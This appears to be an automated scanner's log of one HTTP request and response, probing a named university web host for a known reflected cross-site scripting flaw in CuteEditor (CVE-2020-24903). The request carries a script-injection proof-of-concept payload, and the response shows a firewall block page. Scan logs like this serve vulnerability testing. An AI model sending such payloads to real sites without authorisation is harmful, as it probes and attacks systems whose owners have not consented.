[CVE-2020-24903] Dumped HTTP request for https://aaindex.app.unimelb.edu.au/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>


GET /CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script> HTTP/1.1
Host: aaindex.app.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2020-24903] Dumped HTTP response https://aaindex.app.unimelb.edu.au/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 833
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3138227=T9PHJ5SeRie4aUqF7PyJIOVxk2gAAAAAQUIPAAAAAACFNMfEUzBz4Vu5k/f6MrVB; expires=Thu, 06 Aug 2026 08:08:39 GMT; HttpOnly; path=/; Domain=.app.unimelb.edu.au; Secure; SameSite=None
Set-Cookie: incap_ses_1540_3138227=OJlpWR4dXgGrvGxVQi5fFeVxk2gAAAAAujH26TezP6uYIChbnaDYEQ==; path=/; Domain=.app.unimelb.edu.au; Secure; SameSite=None
Strict-Transport-Security: max-age=31536000
X-Iinfo: 10-5330325-0 0NNN RT(1754493413604 9) q(0 -1 -1 -1) r(0 -1) B15(1,903758,0) U24

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/armd-her-Maies-do-Lenouse-not-one-fast-a-distedi" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=10-5330325-0%200NNN%20RT%281754493413604%209%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29%20B15%281%2c903758%2c0%29%20U24&incident_id=1540000460019835375-25116689675062154&edet=15&cinfo=01000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 1540000460019835375-25116689675062154</iframe></body></html>
